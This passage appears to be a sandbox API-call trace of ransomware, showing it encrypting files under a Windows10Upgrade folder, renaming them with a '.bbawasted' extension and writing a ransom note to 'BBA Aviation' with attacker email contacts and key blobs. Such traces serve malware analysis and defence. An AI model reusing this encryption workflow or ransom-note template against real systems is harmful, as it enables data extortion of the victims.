CryptGenRandom (in: hProv=0x6a6240, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0234.046] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0234.046] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\i386\\BiosBlocks.xml.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\i386\\biosblocks.xml.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0234.047] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0234.048] SetEndOfFile (hFile=0x28c) returned 1 [0234.049] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0234.049] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0234.049] lstrcpyW (in: lpString1=0x6c4bf2, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0234.049] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\i386\\BiosBlocks.xml" (normalized: "c:\\windows10upgrade\\resources\\i386\\biosblocks.xml"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\i386\\BiosBlocks.xml.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\i386\\biosblocks.xml.bbawasted")) returned 1 [0234.079] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\i386\\BiosBlocks.xml.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\i386\\biosblocks.xml.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0234.079] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0234.079] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x16600 [0234.079] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16600) returned 0x600000 [0234.079] CloseHandle (hObject=0x294) returned 1 [0234.211] UnmapViewOfFile (lpBaseAddress=0x600000) returned 1 [0234.213] CloseHandle (hObject=0x280) returned 1 [0234.213] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6adb80 [0234.213] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a5f10) returned 1 [0234.214] CryptGenRandom (in: hProv=0x6a5f10, dwLen=0x1b8, pbBuffer=0x6adbc8 | out: pbBuffer=0x6adbc8) returned 1 [0234.214] CryptReleaseContext (hProv=0x6a5f10, dwFlags=0x0) returned 1 [0234.214] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6570) returned 1 [0234.215] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0234.215] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0234.226] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6b8a28 [0234.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb80 | out: hHeap=0x660000) returned 1 [0234.227] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0234.227] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Dazkzd5VMmBY3zSpdD8ZZ/fZln2FLmE7vS01KqKa1aFRc6cZm0/UU201WiJ+Qgh6\r\nCZChsDhhOksYa8wNzisqxxuoSCXr0A42CJN4P6gHnnGF2lZUECMqVoYgo317AwUy\r\nEi9oPNsV0//mQbZmZnR2kq9ubsx+NprW6RCvrkZeNdHu6ACE73uVQwBFL3jIeOuB\r\npkCRIE/LB8KRdgZvYbCpWdYZY96kgOZJBhii6y4N/dhMzsrc21aDp7gZs43ui7XR\r\nmkDmzoDc7CmMdq8yChxTO8GbgG+45fLBrXp0cWh8pDv4OeduqBMMLFCyVL/WJdhq\r\np5XDlwWZauWLNYnC8LxsEpSv7Ca9DlJaTlVGC7rUIs29x2+WuW/I072D2ivnuGPN\r\n9z5YbP216EXX6AR2VB4WQ3TZ3/ca7rvbrLcZlqZCCllCpw9bm24YDnaNjscvbI6q\r\nXphQKFqfCpHrxx6m3YK6UcxScsp8JZtZ3FvxzqvinxpA9+wQWSg6hxvbKBMbOkU5\r\nJKpw2q1JREdDKOZaNaX9RKLM9LLD9ilMab45NeepLA8GxdyLTBZTfQHYIwC+0fXb\r\n8OQRrjaKDIC71RMd7jzLLHsMBnZHawXDIIoYAzJbDyi7TjXjK/OO9c/kiY2YO/QU\r\n6kb331gW9QdbwLwR8QkhxKzK5qRcX6fHShmS/Mc4GQ0=[end_key]\r\nKEEP IT\r\n") returned 984 [0234.227] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a28 | out: hHeap=0x660000) returned 1 [0234.227] WriteFile (in: hFile=0x28c, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0234.227] SetEndOfFile (hFile=0x28c) returned 1 [0234.231] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0234.231] CloseHandle (hObject=0x28c) returned 1 [0234.231] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0234.232] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b7d10 | out: hHeap=0x660000) returned 1 [0234.232] _aulldvrm () returned 0x0 [0234.232] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6680) returned 1 [0234.233] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0234.233] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0234.233] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\i386\\nxquery.cat") returned 50 [0234.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26e) returned 0x6a1538 [0234.233] lstrcpyW (in: lpString1=0x6a159c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0234.233] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0234.233] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6928) returned 1 [0234.234] CryptGenRandom (in: hProv=0x6a6928, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0234.234] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0234.234] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\i386\\nxquery.cat.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\i386\\nxquery.cat.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0234.248] WriteFile (in: hFile=0x290, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0234.249] SetEndOfFile (hFile=0x290) returned 1 [0234.250] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0234.250] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0234.250] lstrcpyW (in: lpString1=0x6a159c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0234.250] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\i386\\nxquery.cat" (normalized: "c:\\windows10upgrade\\resources\\i386\\nxquery.cat"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\i386\\nxquery.cat.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\i386\\nxquery.cat.bbawasted")) returned 1 [0234.251] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\i386\\nxquery.cat.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\i386\\nxquery.cat.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0234.251] CreateFileMappingW (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0234.251] GetFileSize (in: hFile=0x28c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x2684 [0234.251] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2684) returned 0x5f0000 [0234.252] CloseHandle (hObject=0x28c) returned 1 [0234.253] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0234.253] CloseHandle (hObject=0x280) returned 1 [0234.253] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0234.253] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6708) returned 1 [0234.254] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0234.254] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0234.254] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a68a0) returned 1 [0234.255] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0234.255] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0234.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6ad900 [0234.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0234.348] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0234.348] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]iGeCMMEhsDQgvcyeuQMQNUnpJ0xBB9bSCphp5Y3jPxQoSzD/szvijaPVjbzFGYT8\r\nzqruF4lQm9vPGz8SQ8JTTem2m0owm8e8vEwvKUNGTNnNinbPKD3UvxX8031nBjEt\r\nQLpSW74AGkS/10DNkyO6+mzVrDrDcMOpRfatwJF6kSb0PLWvosxE+sEOtZNsz7g7\r\nlqExO+DbPycHfgYpoepk56VYIC4VtV64WxDkL66XfPjRUTOElRJExBN19Wp5D9mW\r\naInjqaOts5DIUhgVFqwqD1u/uqVIGj6nr/0TPDix/MxQbD4J3iWqg0+KGPm69+Lh\r\nmAFvZPQ+HcrO3XgymYx4XwYGii1Lt5dWMgsPtarYMTppIE+Bj8xP/+8W268PH3Jc\r\nehFCCJ6UcVS6tV5EVKKettj71GSxXykeO9//pakHr37Chd9ea5oCWZycrIuMs4wy\r\ngZ+NQ47yCzI3DyDb8hA0zn6mtpTDtuWlhVg3xW5vZ5B8UIecBfbVdprLKoa+aoeG\r\nIL8n0aPbUK3bVB1rA5TCXRWBBR1ViNOG0HzvwdAuuEfczKf5sGL9MHFFZnr/Vs11\r\n4VxSIANF5F/GfGQLkUjTzuc+Y3KdOaMVko6saazY3CMjbOI/hHk7i/+jqVsEsc7D\r\n7iIe4cMsDtnLZN/njY6iB4oxkfmCltHtHujLGPUT4rs=[end_key]\r\nKEEP IT\r\n") returned 984 [0234.349] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0234.349] WriteFile (in: hFile=0x290, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0234.349] SetEndOfFile (hFile=0x290) returned 1 [0234.352] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0234.352] CloseHandle (hObject=0x290) returned 1 [0234.352] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a1538 | out: hHeap=0x660000) returned 1 [0234.352] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b1db0 | out: hHeap=0x660000) returned 1 [0234.352] _aulldvrm () returned 0x0 [0234.352] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6818) returned 1 [0234.353] CryptGenRandom (in: hProv=0x6a6818, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0234.353] CryptReleaseContext (hProv=0x6a6818, dwFlags=0x0) returned 1 [0234.353] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\bluelogo.png") returned 49 [0234.353] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26c) returned 0x6a1538 [0234.353] lstrcpyW (in: lpString1=0x6a159a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0234.353] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0234.353] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a5f98) returned 1 [0234.354] CryptGenRandom (in: hProv=0x6a5f98, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0234.354] CryptReleaseContext (hProv=0x6a5f98, dwFlags=0x0) returned 1 [0234.354] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\bluelogo.png.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\bluelogo.png.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0234.420] WriteFile (in: hFile=0x290, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0234.421] SetEndOfFile (hFile=0x290) returned 1 [0234.422] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0234.422] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0234.422] lstrcpyW (in: lpString1=0x6a159a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0234.422] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\bluelogo.png" (normalized: "c:\\windows10upgrade\\resources\\ux\\bluelogo.png"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\bluelogo.png.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\bluelogo.png.bbawasted")) returned 1 [0234.471] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\bluelogo.png.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\bluelogo.png.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0234.471] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x28c [0234.471] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x1ba8 [0234.472] MapViewOfFile (hFileMappingObject=0x28c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1ba8) returned 0x600000 [0234.472] CloseHandle (hObject=0x280) returned 1 [0234.493] UnmapViewOfFile (lpBaseAddress=0x600000) returned 1 [0234.493] CloseHandle (hObject=0x28c) returned 1 [0234.493] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0234.493] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6790) returned 1 [0234.494] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0234.494] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0234.494] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6570) returned 1 [0234.494] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0234.494] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0234.536] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6ad900 [0234.536] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0234.536] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6ae598 [0234.536] _snwprintf (in: _Dest=0x6ae598, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]hOQpOj0iggTAjREFjwEjtIlB/4WbDn+6WYuuPsXsYdFKy9GYzYLSfs+WCHL92Vlc\r\nlVZ4aWQEfowKVmpDJjof2fZK0tjH9oFmeoG5HOS7WzeIHGaDn2ol3K8PbgXoMxjc\r\nVrUXzQsT4RD3tmOSX06mEql+7zgQvYiMTubG18UHdbkVP/I9qzGXW4WjzfVmvJqL\r\nJwjZsEhEOpbyXYUrteaXuQgDl6VPl6MbXwfE2YAb3XKK/RCZXTozCGzNVoAfza2e\r\nekO8GYP1Ft92J6UoIYn2JtdPJ7kbIzYHOUtajBGLn2cYVd/KBRcXF224zRWiT48+\r\nCTytfSdICOl5P4L5iM3uBwsIl8ZeqNPp6g68VDwsmYhOsOz7fSEoF64eZq8HlSGU\r\n6e3FhtOe6kSVEmf8kphbZaZRExk+VLZXY9LvihBqvEfk6vLcw1nMCBVXfyJc+YMz\r\nyjXV9niFAd7cyxH3gC4cyA+1iZPSY7Qd09jEUxc0C84MZppaM67cINgXinwWUjlB\r\n272xyATQc13wD5L5CgNZlGN+JXP+iZSAAzc0n3f6zUOZr7Vc4rnc9ONEs3mkTYoT\r\nKI7yCBEkvXmmE/dqlYYjmop86ZjTYsdDutVDNAgDrTLB+8OeeiDSBJ02chVi2p/S\r\nglOATb1TpSTPYL+v3b7NVSoqA+lE+EjyvU3XlnpGO95=[end_key]\r\nKEEP IT\r\n") returned 984 [0234.536] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ad900 | out: hHeap=0x660000) returned 1 [0234.536] WriteFile (in: hFile=0x290, lpBuffer=0x6ae598*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6ae598*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0234.536] SetEndOfFile (hFile=0x290) returned 1 [0234.540] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0234.540] CloseHandle (hObject=0x290) returned 1 [0234.540] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a1538 | out: hHeap=0x660000) returned 1 [0234.540] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b1630 | out: hHeap=0x660000) returned 1 [0234.540] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a69b0) returned 1 [0234.541] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0234.541] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0234.541] lstrlenW (lpString="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\default.css") returned 48 [0234.541] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26a) returned 0x6a21e0 [0234.541] lstrcpyW (in: lpString1=0x6a2240, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0234.541] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6ae598 [0234.541] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a65f8) returned 1 [0234.542] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0xa3a, pbBuffer=0x6ae598 | out: pbBuffer=0x6ae598) returned 1 [0234.542] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0234.542] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\default.css.bbawasted_info" (normalized: "c:\\windows10upgrade\\resources\\ux\\default.css.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0234.543] WriteFile (in: hFile=0x290, lpBuffer=0x6ae598*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6ae598*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0234.544] SetEndOfFile (hFile=0x290) returned 1 [0234.544] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0234.544] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6ae598 | out: hHeap=0x660000) returned 1 [0234.544] lstrcpyW (in: lpString1=0x6a2240, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0234.544] MoveFileW (lpExistingFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\default.css" (normalized: "c:\\windows10upgrade\\resources\\ux\\default.css"), lpNewFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\default.css.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\default.css.bbawasted")) returned 1 [0234.545] CreateFileW (lpFileName="\\\\?\\C:\\Windows10Upgrade\\resources\\ux\\default.css.bbawasted" (normalized: "c:\\windows10upgrade\\resources\\ux\\default.css.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0234.545] CreateFileMappingW (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0234.545] GetFileSize (in: hFile=0x28c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x1687 [0234.545] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1687) returned 0x5f0000 [0234.546] CloseHandle (hObject=0x28c) returned 1 [0234.547] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0234.547] CloseHandle (hObject=0x27c) returned 1 [0234.547] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0234.547] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a69b0) returned 1 [0234.548] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0234.548] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0234.548] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: 